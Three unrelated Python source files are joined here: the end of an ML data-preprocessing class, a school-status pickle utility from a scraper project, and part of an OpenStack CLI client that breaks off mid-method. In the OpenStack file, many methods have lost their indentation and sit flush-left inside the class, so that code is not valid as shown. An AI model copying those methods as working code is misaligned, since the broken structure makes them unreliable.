            f'select feature {self.X_train.shape[1]}'
            f' to {len(features[features])}')
        self.X_train = self.X_train[:, features]
        self.X_test = self.X_test[:, features]
        self.feature_columns = list(np.array(self.feature_columns)[features])
        return

    def _extract_with_ks_validation(self):
        """Drop columns whose train/test distributions differ (KS p < 0.05)."""
        ks = self.configs['pre']['table'].get('ks_validation')
        if not ks:
            return
        logger.info('extract columns with Kolmogorov-Smirnov validation')
        _indexes = []
        for i, col in tqdm(enumerate(self.feature_columns)):
            p_val = ks_2samp(self.X_train[:, i], self.X_test[:, i])[1]
            if p_val < 0.05:
                logger.info(
                    'Kolmogorov-Smirnov not same distriburion: %s'
                    % self.feature_columns[i])
            else:
                _indexes.append(i)
        self.X_train = self.X_train[:, _indexes]
        self.X_test = self.X_test[:, _indexes]
        self.feature_columns = list(np.array(self.feature_columns)[_indexes])
        return

    def _extract_with_adversarial_validation(self):
        """Filter train rows that look unlike test rows (adversarial CV)."""
        def _get_adversarial_preds(X_train, X_test, adversarial):
            """Fit a train-vs-test classifier; return its probabilities."""
            if adversarial['model_config'].get('cv_select') != 'train_all':
                logger.error(
                    'ONLY IMPLEMENTED ADVERSARIAL VALIDATION WITH TRAIN ALL')
                raise Exception('NOT IMPLEMENTED')
            # label train rows 0 and test rows 1
            X_adv = np.vstack((X_train, X_test))
            Y_adv = np.concatenate(
                (np.zeros(X_train.shape[0]), np.ones(X_test.shape[0])),
                axis=0)
            # fit
            single_trainer_obj = SingleTrainer(
                X_train=self.X_train, Y_train=self.Y_train, X_test=self.X_test,
                feature_columns=self.feature_columns, configs=self.configs)
            _, estimator = single_trainer_obj.calc_single_estimator(
                adversarial['model_config'], X_train=X_adv, Y_train=Y_adv)
            if not hasattr(estimator, 'predict_proba'):
                logger.error(
                    'NOT PREDICT_PROBA METHOD IN ADVERSARIAL ESTIMATOR')
                raise Exception('NOT IMPLEMENTED')
            if hasattr(estimator, 'classes_'):
                test_index = list(estimator.classes_).index(1)
            else:
                logger.warning('CLASSES_ NOT IN ESTIMATOR')
                test_index = 1
            # report how separable train and test are
            auc = roc_auc_score(
                Y_adv, estimator.predict_proba(X_adv)[:, test_index])
            logger.info(f'auc: {auc}')
            adv_train_preds = estimator.predict_proba(X_train)[:, test_index]
            adv_test_preds = estimator.predict_proba(X_test)[:, test_index]
            return adv_train_preds, adv_test_preds

        adversarial = \
            self.configs['pre']['table'].get('adversarial_validation')
        if not adversarial:
            return
        logger.info('extract train data with adversarial validation')
        logger.warning('IN DATA PREPROCESSING, USING TEST DATA')
        adv_train_preds, adv_test_preds = _get_adversarial_preds(
            self.X_train, self.X_test, adversarial)
        logger.info('adversarial train preds:')
        display(pd.DataFrame(adv_train_preds).describe(include='all'))
        logger.info('adversarial test preds:')
        display(pd.DataFrame(adv_test_preds).describe(include='all'))
        if adversarial.get('add_column'):
            logger.info('add adversarial_test_proba column to X')
            self.feature_columns.append('adversarial_test_proba')
            self.X_train = np.hstack(
                (self.X_train,
                 np.array(adv_train_preds.reshape(-1, 1))))
            self.X_test = np.hstack(
                (self.X_test,
                 np.array(adv_test_preds.reshape(-1, 1))))
        # keep only train rows that resemble the test distribution
        threshold = adversarial.get('threshold', 0.5)
        org_len = self.X_train.shape[0]
        self.X_train = self.X_train[adv_train_preds > threshold]
        self.Y_train = self.Y_train[adv_train_preds > threshold]
        logger.info('with threshold %s, train data reduced %s => %s'
                    % (threshold, org_len, self.X_train.shape[0]))
        return

    def _extract_with_no_anomaly_validation(self):
        """Drop anomalous train rows found by IsolationForest."""
        no_anomaly = self.configs['pre']['table'].get('no_anomaly_validation')
        if not no_anomaly:
            return
        logger.info('extract no anomaly train data')
        contamination = no_anomaly.get('contamination')
        # BUG FIX: the old guard `not contamination and int(contamination)
        # != 0` raised TypeError (int(None)) when the option was absent.
        # Default to 'auto' only when it is missing so an explicit 0 or
        # float value is honored.
        if contamination is None:
            contamination = 'auto'
        isf = IsolationForest(
            contamination=contamination, random_state=42, n_jobs=-1)
        preds = isf.fit_predict(self.X_train, self.Y_train)
        train_scores = isf.decision_function(self.X_train)
        test_scores = isf.decision_function(self.X_test)
        if no_anomaly.get('add_column'):
            logger.info('add no_anomaly_score column to X')
            self.feature_columns.append('no_anomaly_score')
            self.X_train = np.hstack(
                (self.X_train,
                 np.array(train_scores.reshape(-1, 1))))
            self.X_test = np.hstack(
                (self.X_test,
                 np.array(test_scores.reshape(-1, 1))))
        # IsolationForest labels inliers 1 and anomalies -1
        org_len = self.X_train.shape[0]
        self.X_train = self.X_train[preds == 1]
        self.Y_train = self.Y_train[preds == 1]
        logger.info('train data reduced %s => %s'
                    % (org_len, self.X_train.shape[0]))
        return

    def _reshape_x_for_keras(self):
        """Reshape X to the layout expected by the configured keras model."""
        mode = self.configs['pre']['table'].get('reshape_for_keras')
        if not mode:
            return
        logger.info('reshape x for keras: %s' % mode)
        if mode == 'lstm':
            self.X_train = self.X_train.reshape(*self.X_train.shape, 1)
            self.X_test = self.X_test.reshape(*self.X_test.shape, 1)
            # repeat the feature axis once per label class
            label_num = len(np.unique(self.Y_train))
            self.X_train = np.concatenate([self.X_train] * label_num, axis=2)
            self.X_test = np.concatenate([self.X_test] * label_num, axis=2)
        else:
            logger.error('NOT IMPLEMENTED RESHAPE FOR KERAS: %s' % mode)
            raise Exception('NOT IMPLEMENTED')
        return

    def _to_sparse(self):
        """Convert X to CSR sparse matrices when configured and safe."""
        sparse = self.configs['pre']['table'].get('sparse')
        if not sparse:
            return
        if self.X_train.dtype == 'object':
            return
        # skipped when a g_nb model is configured — presumably because that
        # estimator cannot handle sparse input; confirm against the trainer
        if 'g_nb' not in [
            _c['model'] for _c
            in self.configs['fit']['single_model_configs']
        ]:
            logger.info('set x to sparse')
            self.X_train = sp.csr_matrix(self.X_train)
            self.X_test = sp.csr_matrix(self.X_test)
        return

    def calc_train_data(self):
        """Run the full preprocessing pipeline end to end."""
        # DataFrame stage
        self._calc_raw_data()
        self._translate_adhoc_df()
        self._delete_columns()
        self._encode_category()
        # ndarray stage
        self._calc_base_train_data()
        self._translate_adhoc_ndarray()
        self._to_float32()
        self._translate_y_pre()
        # validation / filtering stage
        self._select_feature()
        self._extract_with_ks_validation()
        self._extract_with_adversarial_validation()
        self._extract_with_no_anomaly_validation()
        # final formatting stage
        self._reshape_x_for_keras()
        self._to_sparse()
        return
|
<reponame>chidinzerem/chidinzerem.github.io<filename>code/WEBSCRAPER PYTHON/status.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ------------------------
# Penji OpDev Fall 2019
# Check Status of School
# Author: <NAME>
# Updated: 02.08.2019
# ------------------------
# General
import os
import shutil
import pickle
import argparse
from collections import OrderedDict
from pprint import pprint as pprint
# Local
from core.config import cfg
from core.utils import setup_logger, load_user_profile
from core import logger
# Template status record: tracks how far a school's scraping pipeline has run.
# Used as the initial value when no pickled status file exists yet.
s_temp = OrderedDict()
s_temp['ready'] = 'No'
s_temp['course_scraper'] = 'Not Started'
s_temp['email_scraper'] = 'Not Started'
s_temp['Professor Archive'] = 'Not Started'
s_temp['Course Archive'] = 'Not Started'
s_temp['Archive Updated'] = '<term>'
s_temp['GS Prepped'] = 'No'
s_temp['GS Uploaded'] = 'No'
s_temp['Notes'] = ''
# Spreadsheet columns that may be edited by hand during sign-off.
update_columns = (
    'Signoff (Name, Date)',
    'Pre-Approval Status',
    'LHP Response (yes/no)',
    'Planned Date',
    'Notes')
def update_status(args, status_dict):
    """Interactively update a school's status dict and persist it to disk.

    Each field's current value is shown; a blank input keeps it. The result
    is pickled to ``data/<school>/status.p``.

    :param args: parsed argparse namespace (uses args.school)
    :param status_dict: the status mapping to edit in place
    """
    print('For each displayed argument enter a value or leave it blank\n'
          '------------------------------------------------------------')
    for key, value in status_dict.items():
        print(f'CURRENT: {key} = {value}')
        new_val = input(f'INPUT -> {key} = ')
        print('------------------------------')
        if new_val != '':
            status_dict[key] = new_val
    info_str = 'Will Update Information To:\n' \
               '------------------------------'
    for key, value in status_dict.items():
        info_str += f'\n {key} : {value}'
    logger.info(info_str)
    # pause so the user can review before the file is overwritten
    # (old code bound this to an unused `to_save` variable)
    input('Press enter to continue')
    file_name = f'data/{args.school}/status.p'
    # close the file handle deterministically (the old bare open() leaked it)
    with open(file_name, 'wb') as fh:
        pickle.dump(status_dict, fh)
def check_status(args):
    """Load (or initialize) the pickled status dict for a school and log it.

    If ``data/<school>/status.p`` exists it is loaded; otherwise the module
    template ``s_temp`` is written there and used.

    :param args: parsed argparse namespace (uses args.school)
    :return: the status dict
    """
    file_name = f'data/{args.school}/status.p'
    if os.path.exists(file_name):
        # old code used bare open() inside pickle.load/dump, leaking the
        # file handles — `with` closes them deterministically
        with open(file_name, 'rb') as fh:
            status_dict = pickle.load(fh)
    else:
        status_dict = s_temp
        with open(file_name, 'wb') as fh:
            pickle.dump(status_dict, fh)
    info_str = f'Current Status for {cfg[args.school.upper()].NICE_NAME}'
    for key, value in status_dict.items():
        info_str += f'\n {key} : {value}'
    logger.info(info_str)
    return status_dict
def reset_status(args):
    """Delete the school's pickled status file, if one exists."""
    status_file = f'data/{args.school}/status.p'
    if os.path.exists(status_file):
        os.remove(status_file)
def reset_logs(args):
    """Remove the school's log directory tree, if one exists."""
    log_dir = f'data/{args.school}/logs'
    if os.path.exists(log_dir):
        shutil.rmtree(log_dir)
if __name__ == '__main__':
    # Parser for command input
    parser = argparse.ArgumentParser('Check or Update Status of School ')
    # General PenjiDev Args
    parser.add_argument('-school', help='Enter a school name', required=True)
    parser.add_argument('-term', help='Enter a term', default='fall19')
    parser.add_argument('-test', action='store_true', help='Test Runs')
    parser.add_argument('-log', help='Enter logger level: debug, info, warn, error, none', default='info', type=str)
    # Special Args
    parser.add_argument('-update', action='store_true', help='Update Status')
    parser.add_argument('-reset_status', action='store_true', help='Reset Status')
    parser.add_argument('-reset_logs', action='store_true', help='Reset Log Files')
    parser_args = parser.parse_args()
    setup_logger(parser_args, 'status')
    # Order matters: optional reset first, then display, then interactive
    # update, then optional log cleanup.
    if parser_args.reset_status:
        reset_status(parser_args)
    status_dict = check_status(parser_args)
    if parser_args.update:
        update_status(parser_args, status_dict)
    if parser_args.reset_logs:
        reset_logs(parser_args)
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import os
import re
import sys
import time
from enum import Enum
from inspect import FrameInfo
from json import JSONDecodeError
from typing import Callable, Dict, Iterable, List, Optional, TypeVar, Union
from openstack_cli.modules.apputils.curl import CURLResponse, CurlRequestType, curl
from openstack_cli.modules.apputils.progressbar import CharacterStyles, ProgressBar, ProgressBarFormat, \
ProgressBarOptions
from openstack_cli.modules.apputils.terminal.colors import Colors
from openstack_cli.modules.openstack.api_objects import APIProjects, ComputeFlavorItem, ComputeFlavors, ComputeLimits, \
ComputeServerActionRebootType, ComputeServerActions, ComputeServerInfo, ComputeServers, DiskImageInfo, DiskImages, \
LoginResponse, NetworkItem, NetworkLimits, Networks, Region, RegionItem, Subnets, Token, VMCreateResponse, \
VMKeypairItem, \
VMKeypairItemValue, VMKeypairs, VolumeV3Limits
from openstack_cli.modules.openstack.objects import AuthRequestBuilder, AuthRequestType, EndpointTypes, ImageStatus, \
OSFlavor, OSImageInfo, OSNetwork, OpenStackEndpoints, OpenStackQuotaType, OpenStackQuotas, OpenStackUsers, \
OpenStackVM, OpenStackVMInfo, ServerPowerState, ServerState, VMCreateBuilder
T = TypeVar('T')
class JSONValueError(ValueError):
    """ValueError that tags its message when the message is valid JSON.

    str() is prefixed with KEY so callers can detect the marker and
    re-parse the embedded JSON document; for non-JSON messages it behaves
    like a plain ValueError.
    """
    KEY: str = "{@json@}:"

    def __init__(self, data: str):
        # Always initialize the base class explicitly; the old code only
        # did so on the JSON-parse failure path and relied on
        # BaseException.__new__ having set args as a side effect.
        super().__init__(data)
        self.__data = None
        try:
            json.loads(data)
            self.__data = data  # message is valid JSON — remember it
        except (TypeError, JSONDecodeError):
            pass  # not JSON (or not a string): plain ValueError behavior

    def __str__(self):
        return f"{self.KEY}{self.__data}" if self.__data else super().__str__()
class LocalCacheType(Enum):
    """Keys for the per-instance (in-process) request cache used by OpenStack."""
    SERVERS = 0   # cached result of get_servers()
    KEYPAIR = 1   # cached result of get_keypairs()
class OpenStack(object):
    def __init__(self, conf, debug: bool = False):
        """
        Create a client bound to *conf*; no network I/O happens until login().

        :type conf openstack_cli.core.config.Configuration
        :param debug: enables per-request tracing (also via API_DEBUG=True env var)
        """
        self.__last_errors: List[str] = []
        self.__login_api = f"{conf.os_address}/v3"
        self._conf = conf
        self.__endpoints__: Optional[OpenStackEndpoints] = None
        self.__cache_images: Dict[str, DiskImageInfo] = {}
        # initializes in 2 steps: scanning images and server list when it is requested
        self.__users_cache: Optional[OpenStackUsers] = None
        self.__flavors_cache: Optional[Dict[str, OSFlavor]] = {}
        self.__networks_cache: Optional[OSNetwork] = None
        self.__debug = debug or os.getenv("API_DEBUG", False) == "True"
        self.__local_cache: Dict[LocalCacheType, object] = {}
        # matches image names like "<os name><sep><version...>", e.g. "Ubuntu-20.04 LTS"
        pattern_str = f"[\\W\\s]*(?P<name>{'|'.join(conf.supported_os_names)})(\\s|\\-|\\_)(?P<ver>[\\d\\.]+\\s*[\\w]*).*$"
        self.__os_image_pattern = re.compile(pattern_str, re.IGNORECASE)
        self.__is_auth: bool = False
    def __invalidate_local_cache(self, cache_type: LocalCacheType):
        """Drop the cached value for *cache_type* so the next read re-queries the API."""
        self.__local_cache[cache_type.value] = None
    def __set_local_cache(self, cache_type: LocalCacheType, value: T) -> T:
        """Store *value* under *cache_type* and return it unchanged (pass-through)."""
        self.__local_cache[cache_type.value] = value
        return value
def __get_local_cache(self, cache_type: LocalCacheType) -> T:
if cache_type.value not in self.__local_cache:
return None
return self.__local_cache[cache_type.value]
    def __init_after_auth__(self):
        """Warm the persistent and in-memory caches right after a successful scoped login."""
        def __cache_ssh_keys():
            # Pull server-side keypairs into the local config store, replacing
            # local copies whose hash no longer matches the server's.
            conf_keys_hashes = [hash(k) for k in self._conf.get_keys()]
            server_keys = self.get_keypairs()
            for server_key in server_keys:
                if hash(server_key) not in conf_keys_hashes:
                    try:
                        self._conf.add_key(server_key)
                    except ValueError:
                        print(f"Key {server_key.name} is present locally but have wrong hash, replacing with server key")
                        self._conf.delete_key(server_key.name)
                        self._conf.add_key(server_key)
            # marker entry: only its presence is checked below, the value is unused
            self._conf.cache.set(VMKeypairItemValue, "this super cache")
        def __cached_network():
            # Restore the network topology from the persistent cache.
            self.__networks_cache = OSNetwork(serialized_obj=self._conf.cache.get(OSNetwork))
        def __cached_images():
            # Restore the image id -> DiskImageInfo map from the persistent cache.
            self.__cache_images = {k: DiskImageInfo(serialized_obj=v) for k, v in json.loads(self._conf.cache.get(DiskImageInfo)).items()}
        def __cached_flavors():
            # Restore the flavor id -> OSFlavor map from the persistent cache.
            self.__flavors_cache = {k: OSFlavor(serialized_obj=v) for k, v in json.loads(self._conf.cache.get(OSFlavor)).items()}
        def __cached_ssh_keys():
            # Keys were already synced into the config on a previous run; nothing to do.
            return True
        # For each cached type: False -> fetch from the API, True -> load from cache.
        _cached_objects = {
            DiskImageInfo: {
                False: lambda: self.images,
                True: lambda: __cached_images()
            },
            OSFlavor: {
                False: lambda: self.flavors,
                True: lambda: __cached_flavors()
            },
            OSNetwork: {
                False: lambda: self.networks,
                True: lambda: __cached_network()
            },
            VMKeypairItemValue: {
                False: lambda: __cache_ssh_keys(),
                True: lambda: __cached_ssh_keys()
            }
        }
        need_recache: bool = False in [self._conf.cache.exists(obj) for obj in _cached_objects]
        if need_recache and not self.__debug:
            # slow path (real API calls): show a progress bar unless debugging
            p = ProgressBar("Syncing to the server data", 20,
                            ProgressBarOptions(CharacterStyles.simple, ProgressBarFormat.PROGRESS_FORMAT_STATUS)
                            )
            p.start(len(_cached_objects))
            for cache_item, funcs in _cached_objects.items():
                p.progress_inc(1, cache_item.__name__)
                funcs[self._conf.cache.exists(cache_item)]()
            p.stop(hide_progress=True)
        else:
            for cache_item, funcs in _cached_objects.items():
                funcs[self._conf.cache.exists(cache_item)]()
        if not self.__users_cache:
            # property access builds the users cache as a side effect
            self.users
    def __check_token(self) -> bool:
        """Validate the stored auth token and rebuild the endpoint catalog from it."""
        headers = {
            "X-Auth-Token": self._conf.auth_token,
            "X-Subject-Token": self._conf.auth_token
        }
        r = self._request_simple(
            EndpointTypes.identity,
            "/auth/tokens",
            req_type=CurlRequestType.GET,
            headers=headers
        )
        if not r:
            from openstack_cli.core.output import Console
            Console.print_error("Authentication server is not accessible")
            return False
        if r.code not in [200, 201]:
            # token expired or revoked
            return False
        l_resp = LoginResponse(serialized_obj=r.content)
        self.__endpoints__ = OpenStackEndpoints(self._conf, l_resp)
        self._conf.user_id = l_resp.token.user.id
        return True
def __auth(self, _type: AuthRequestType = AuthRequestType.SCOPED) -> bool:
if self._conf.auth_token and self.__check_token():
return True
if _type == AuthRequestType.UNSCOPED:
data = AuthRequestBuilder.unscoped_login(self._conf.os_login, self._conf.os_password)
elif _type == AuthRequestType.SCOPED and self._conf.project.id:
data = AuthRequestBuilder.scoped_login(self._conf.os_login, self._conf.os_password, self._conf.project)
else:
data = AuthRequestBuilder.normal_login(self._conf.os_login, self._conf.os_password)
r = self._request_simple(
EndpointTypes.identity,
"/auth/tokens",
req_type=CurlRequestType.POST,
data=data
)
if not r:
from openstack_cli.core.output import Console
data = r.raw if r else "none"
Console.print_error(f"Authentication server is not accessible: {data}")
return False
if r.code not in [200, 201]:
return False
auth_token = r.headers["X-Subject-Token"] if "X-Subject-Token" in r.headers else None
self._conf.auth_token = auth_token
l_resp = LoginResponse(serialized_obj=r.from_json())
if _type == AuthRequestType.UNSCOPED:
l_resp.token = Token(catalog=[])
self.__endpoints__ = None
else:
self._conf.user_id = l_resp.token.user.id
self.__endpoints__ = OpenStackEndpoints(self._conf, l_resp)
return True
    def last_errors(self) -> List[str]:
        """
        Return the list of errors collected so far.

        NOTE(review): the original docstring claimed the results are cleaned on
        read, but nothing is cleared here — call clear_errors() explicitly.
        """
        return self.__last_errors
    def clear_errors(self):
        """Reset the error list (rebinds; previously returned references keep the old list)."""
        self.__last_errors = []
    @property
    def has_errors(self) -> bool:
        """True when at least one error has been recorded since the last clear."""
        return len(self.__last_errors) > 0
    @property
    def __endpoints(self) -> OpenStackEndpoints:
        # Private alias for the endpoint catalog resolved during login (None before).
        return self.__endpoints__
    @property
    def endpoints(self):
        """Public accessor for the resolved endpoint catalog (None before login)."""
        return self.__endpoints
    def logout(self):
        """Drop the stored auth token; the next request will trigger a fresh login."""
        self._conf.auth_token = ""
def login(self, _type: AuthRequestType = AuthRequestType.SCOPED) -> bool:
if self.__auth(_type):
self.__is_auth = True
if _type != AuthRequestType.UNSCOPED and self._conf.region:
self.__init_after_auth__()
return True
else:
self.__last_errors.append("Login failed, some exception happen")
return False
    def __get_origin_frame(self, base_f_name: str) -> List[FrameInfo]:
        """
        Locate *base_f_name* on the call stack and return the three frames above
        it (outermost first) for debug tracing.

        NOTE(review): assumes at least three caller frames exist above the match
        (IndexError otherwise) and returns None when the name is not found —
        confirm the debug-only call sites tolerate both.
        """
        import inspect
        _frames = inspect.stack()
        for i in range(0, len(_frames)):
            if _frames[i].function == base_f_name:
                return [_frames[i+3], _frames[i+2], _frames[i+1]]
def _request_simple(self,
endpoint: EndpointTypes,
relative_uri: str,
params: Dict[str, str] = None,
headers: Dict[str, str] = None,
req_type: CurlRequestType = CurlRequestType.GET,
data: str or dict = None
) -> CURLResponse or None:
if endpoint == EndpointTypes.identity:
_endpoint: str = f"{self.__login_api}"
else:
_endpoint: str = self.__endpoints.get_endpoint(endpoint)
url = f"{_endpoint}{relative_uri}"
_t_start = 0
if self.__debug:
_t_start = time.time_ns()
r = None
try:
return curl(url, req_type=req_type, params=params, headers=headers, data=data)
except TimeoutError:
self.__last_errors.append("Timeout exception on API request")
return None
finally:
if self.__debug:
from openstack_cli.core.output import Console
_t_delta = time.time_ns() - _t_start
_t_sec = _t_delta / 1000000000
_params = ",".join([f"{k}={v}" for k, v in params.items()]) if params else "None"
_f_caller = self.__get_origin_frame(self._request_simple.__name__)
_chunks = [
f"[{_t_sec:.2f}s]",
f"[{req_type.value}]",
f"[{endpoint.value}]",
f" {relative_uri}; ",
str(Colors.RESET),
f"{Colors.BRIGHT_BLACK}{os.path.basename(_f_caller[0].filename)}{Colors.RESET}: ",
f"{Colors.BRIGHT_BLACK}->{Colors.RESET}".join([f"{f.function}:{f.lineno}" for f in _f_caller])
]
Console.print_debug("".join(_chunks))
    def _request(self,
                 endpoint: EndpointTypes,
                 relative_uri: str,
                 params: Dict[str, str] = None,
                 req_type: CurlRequestType = CurlRequestType.GET,
                 is_json: bool = False,
                 page_collection_name: str = None,
                 data: str or dict = None
                 ) -> str or dict or None:
        """
        Perform an authenticated API request, logging in on demand.

        :param page_collection_name: when set (with is_json=True), "next" links
            are followed recursively and that collection is merged across pages.
        :raises RuntimeError: when authentication fails.
        :raises JSONValueError: for any non-2xx response (message carries the body).
        :return: response text, parsed dict, or None on timeout.
        """
        if not self.__is_auth and not self.login():
            raise RuntimeError("Not Authorised")
        _endpoint = self.__login_api if endpoint == EndpointTypes.identity else self.__endpoints.get_endpoint(endpoint)
        _t_start = 0
        if self.__debug:
            _t_start = time.time_ns()
        url = f"{_endpoint}{relative_uri}"
        headers = {
            "X-Auth-Token": self._conf.auth_token
        }
        r = None
        try:
            r = curl(url, req_type=req_type, params=params, headers=headers, data=data)
        except TimeoutError:
            self.__last_errors.append("Timeout exception on API request")
            return
        finally:
            # debug trace: timing, endpoint and a short caller backtrace
            if self.__debug:
                from openstack_cli.core.output import Console
                _t_delta = time.time_ns() - _t_start
                _t_sec = _t_delta / 1000000000
                _params = ",".join([f"{k}={v}" for k, v in params.items()]) if params else "None"
                _f_caller = self.__get_origin_frame(self._request.__name__)
                _chunks = [
                    f"[{_t_sec:.2f}s]",
                    f"[{req_type.value}]",
                    f"[{endpoint.value}]",
                    f" {relative_uri}; ",
                    str(Colors.RESET),
                    f"{Colors.BRIGHT_BLACK}{os.path.basename(_f_caller[0].filename)}{Colors.RESET}: ",
                    f"{Colors.BRIGHT_BLACK}->{Colors.RESET}".join([f"{f.function}:{f.lineno}" for f in _f_caller])
                ]
                Console.print_debug("".join(_chunks))
        if r.code not in [200, 201, 202, 204]:
            # if not data:
            #   return None
            raise JSONValueError(r.content)
        if r.code in [204]:
            # 204 No Content: nothing to parse
            return ""
        content = r.from_json() if is_json else r.content
        if is_json and page_collection_name and isinstance(content, dict):
            # transparently follow pagination links and merge the collection
            if "next" in content and content["next"]:
                uri, _, args = content["next"].partition("?")
            elif "links" in content and "next" in content["links"] and content["links"]["next"]:
                uri, _, args = content["links"]["next"].partition("?")
            else:
                return content
            params = dict([i.split("=") for i in args.split("&")])
            next_page = self._request(
                endpoint,
                uri,
                params=params,
                req_type=req_type,
                is_json=is_json,
                page_collection_name=page_collection_name
            )
            content[page_collection_name].extend(next_page[page_collection_name])
        return content
@property
def regions(self) -> List[RegionItem]:
r = self._request(EndpointTypes.identity, "/regions", is_json=True, page_collection_name="regions")
return Region(serialized_obj=r).regions
@property
def projects(self):
d = self._request(
EndpointTypes.identity,
"/auth/projects",
is_json=True,
req_type=CurlRequestType.GET,
)
return APIProjects(serialized_obj=d).projects
    @property
    def users(self) -> OpenStackUsers:
        """User directory derived from image ownership; built once and cached."""
        if self.__users_cache:
            return self.__users_cache
        self.__users_cache = OpenStackUsers(self.images)
        # make sure the current account resolves even if it owns no images
        self.__users_cache.add_user(self._conf.user_id, self._conf.os_login)
        return self.__users_cache
@property
def images(self) -> List[DiskImageInfo]:
if self.__cache_images:
return list(self.__cache_images.values())
params = {
"limit": "1000"
}
images = DiskImages(
serialized_obj=self._request(
EndpointTypes.image,
"/images",
is_json=True,
page_collection_name="images",
params=params
)
).images
_cached_images = {}
_cached = {}
for img in images:
_cached_images[img.id] = img
_cached[img.id] = img.serialize()
self._conf.cache.set(DiskImageInfo, _cached)
self.__cache_images = _cached_images
return list(self.__cache_images.values())
    def get_os_image(self, image: DiskImageInfo) -> Optional[OSImageInfo]:
        """Parse a raw image into an (os name, version) pair; None for forks or unparsable names."""
        if image.image_type:  # process only base images
            return None
        match = re.match(self.__os_image_pattern, image.name)
        if not match:
            return None
        os_img = OSImageInfo(
            match.group("name"),
            match.group("ver"),
            image
        )
        # === here is some lame way to filter out image forks or non-base images by analyzing image name
        # ToDo: Is here a better way to distinguish the image os?
        # try to handle situations like "x yyyy" in versions and treat them like "x.yyyy"
        ver = os_img.version.split(" ") if " " in os_img.version else None
        if ver:
            try:
                ver = ".".join([str(int(n)) for n in ver])
            except ValueError:
                # non-numeric chunk: keep the original version string untouched
                ver = None
            if ver:
                os_img.version = ver
        # anything still containing a space (except "SP" service packs) is treated as a fork
        if "SP" not in os_img.version and " " in os_img.version:
            return None
        return os_img
    @property
    def os_images(self) -> List[OSImageInfo]:
        """Parsed OS images, de-duplicated by (os name, version) and sorted by name."""
        img = []
        known_versions = {}
        for image in self.images:
            os_img: OSImageInfo = self.get_os_image(image)
            if os_img is None:
                continue
            if os_img.os_name.lower() not in known_versions:
                known_versions[os_img.os_name.lower()] = []
            if os_img.version in known_versions[os_img.os_name.lower()]:
                # same os/version seen already -> duplicate upload, skip it
                continue
            known_versions[os_img.os_name.lower()].append(os_img.version)
            # == /end
            img.append(os_img)
        img = sorted(img, key=lambda x: x.name)
        return img
def get_image(self, image_id: str) -> DiskImageInfo or None:
if not self.__cache_images:
a = self.images
if image_id in self.__cache_images:
return self.__cache_images[image_id]
return None
    @property
    def quotas(self) -> OpenStackQuotas:
        """Aggregate compute and network quota usage into one OpenStackQuotas object."""
        limits_obj = ComputeLimits(self._request(EndpointTypes.compute, "/limits")).limits.absolute
        network_obj = NetworkLimits(serialized_obj=self._request(
            EndpointTypes.network,
            f"/quotas/{self.__endpoints.project_id}/details.json",
            is_json=True
        )).quota
        # volume = VolumeV3Limits(
        #   serialized_obj=self.__request(
        #     EndpointTypes.volumev3,
        #     f"/os-quota-sets/{self.__endpoints.project_id}", params={"usage": "True"}, is_json=True
        #   )
        # )
        quotas = OpenStackQuotas()
        quotas.add(OpenStackQuotaType.CPU_CORES, limits_obj.maxTotalCores, limits_obj.totalCoresUsed)
        # RAM values appear to be MB (divided by 1024 for the GB view below)
        quotas.add(OpenStackQuotaType.RAM_GB, limits_obj.maxTotalRAMSize / 1024, limits_obj.totalRAMUsed / 1024)
        quotas.add(OpenStackQuotaType.INSTANCES, limits_obj.maxTotalInstances, limits_obj.totalInstancesUsed)
        quotas.add(OpenStackQuotaType.NET_PORTS, network_obj.port.limit, network_obj.port.used)
        # no "keypairs used" counter in the limits payload, hence the hardcoded 0
        quotas.add(OpenStackQuotaType.KEYPAIRS, limits_obj.maxTotalKeypairs, 0)
        quotas.add(OpenStackQuotaType.SERVER_GROUPS, limits_obj.maxServerGroups, limits_obj.totalServerGroupsUsed)
        quotas.add(OpenStackQuotaType.RAM_MB, limits_obj.maxTotalRAMSize, limits_obj.totalRAMUsed)
        return quotas
@property
def flavors(self) -> List[OSFlavor]:
if self.__flavors_cache:
return list(self.__flavors_cache.values())
params = {
"limit": "1000"
}
flavors_raw = self._request(
EndpointTypes.compute,
"/flavors/detail",
is_json=True,
params=params,
page_collection_name="flavors"
)
__flavors_cache = {}
_cache = {}
for flavor in ComputeFlavors(serialized_obj=flavors_raw).flavors:
_flavor = OSFlavor.get(flavor)
self.__flavors_cache[_flavor.id] = _flavor
_cache[_flavor.id] = _flavor.serialize()
self._conf.cache.set(OSFlavor, _cache)
return list(self.__flavors_cache.values())
    def get_flavors(self, image: OSImageInfo = None) -> Iterable[OSFlavor]:
        """
        Returns acceptable flavors for image, smallest disk first.

        NOTE(review): the condition requires an image, so image=None yields
        nothing — confirm whether an unfiltered mode was intended.
        """
        for fl in sorted(self.flavors, key=lambda x: x.disk):
            if image and fl.disk > image.size and fl.ephemeral_disk > 0:
                yield fl
    def get_flavor(self, image: OSImageInfo = None, name: str = "") -> OSFlavor or None:
        """Return the flavor named *name*, or (no name) the smallest acceptable one for *image*."""
        if not name:
            flavors = list(self.get_flavors(image))
            if flavors:
                # get_flavors yields in ascending disk order, so [0] is the smallest fit
                return flavors[0]
        else:
            for fl in self.flavors:
                if fl.name == name:
                    return fl
        return None
def get_image_by_alias(self, alias: str) -> Iterable[OSImageInfo]:
"""
Return image object by given alias name
"""
for img in self.os_images:
if img.alias == alias:
yield img
    def get_servers(self, arguments: dict = None, invalidate_cache: bool = False) -> OpenStackVM or None:
        """
        Fetch the server list, optionally filtered by *arguments*.

        Unfiltered results are cached per instance; filtered queries always hit
        the API and are never cached.
        """
        if arguments is None:
            arguments = {}
        if invalidate_cache:
            self.__invalidate_local_cache(LocalCacheType.SERVERS)
        __cached_value = self.__get_local_cache(LocalCacheType.SERVERS)
        if __cached_value is not None and not arguments:
            return __cached_value
        params = {
            "limit": "1000"
        }
        params.update(arguments)
        servers_raw = self._request(
            EndpointTypes.compute,
            "/servers/detail",
            is_json=True,
            params=params,
            page_collection_name="servers"
        )
        servers = ComputeServers(serialized_obj=servers_raw).servers
